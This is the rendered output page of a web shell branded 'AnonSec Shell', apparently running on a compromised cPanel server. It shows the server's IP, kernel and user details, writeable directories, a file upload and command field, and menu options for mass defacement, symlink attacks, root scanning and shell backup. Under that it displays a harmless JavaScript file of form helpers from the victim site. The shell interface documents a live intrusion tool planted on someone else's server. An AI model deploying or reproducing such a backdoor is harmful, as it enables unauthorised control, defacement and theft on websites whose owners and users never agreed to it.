AnonSec Shell
Server IP : 172.67.216.113  /  Your IP : 172.71.28.145   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/cp648411/www/simded.com/prophecyadmin/control/backend/include/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/cp648411/www/simded.com/prophecyadmin/control/backend/include/function.js
function Jump(obj,i){
		
		if(document.getElementById(obj.id).value.length == 1)
		document.getElementById('mun_pos'+i).focus();
}
function validate_number(evt) {
	
  var theEvent = evt || window.event;
  var key = theEvent.keyCode || theEvent.which;
  key = String.fromCharCode( key );
  var regex = /[0-9]|\./;
  if( !regex.test(key) ) {
	theEvent.returnValue = false;
	if(theEvent.preventDefault) theEvent.preventDefault();
  }
}
function testHoldon(themeName){
	
	HoldOn.open({
		theme:themeName,
		message:"<h4> กำลังบันทึกข้อมูล </h4>"
	});
}
function testHoldon_cl(themeName){
	
	setTimeout(function(){
		HoldOn.close();
	},0);
}
function dokeyup( obj, e ){
	var keynum;
	if(window.event){
		// IE
		keynum = e.keyCode;
	}else if(e.which) {
		// Netscape/Firefox/Opera
		keynum = e.which;
		}
	  if( keynum != 37 & keynum != 39 & keynum != 110 ){
		var value = obj.value;
		var svals = value.split( "." ); //Cut decimal point
		var sval = svals[0]; //Integer
		var n = 0;
		var result = "";
		var c = "";
		for ( a = sval.length - 1; a >= 0 ; a-- ){
		
		  c = sval.charAt(a);
		  
		  if ( c != ',' ){
			n++;
			if ( n == 4 ){
			  result = "," + result;
			  n = 1;
			};
			result = c + result;
		  };
		};
	 
		if ( svals[1] ){
		  result = result + '.' + svals[1];
		};
	 
		obj.value = result;
	  };
	};

Anon7 - 2022
AnonSec Team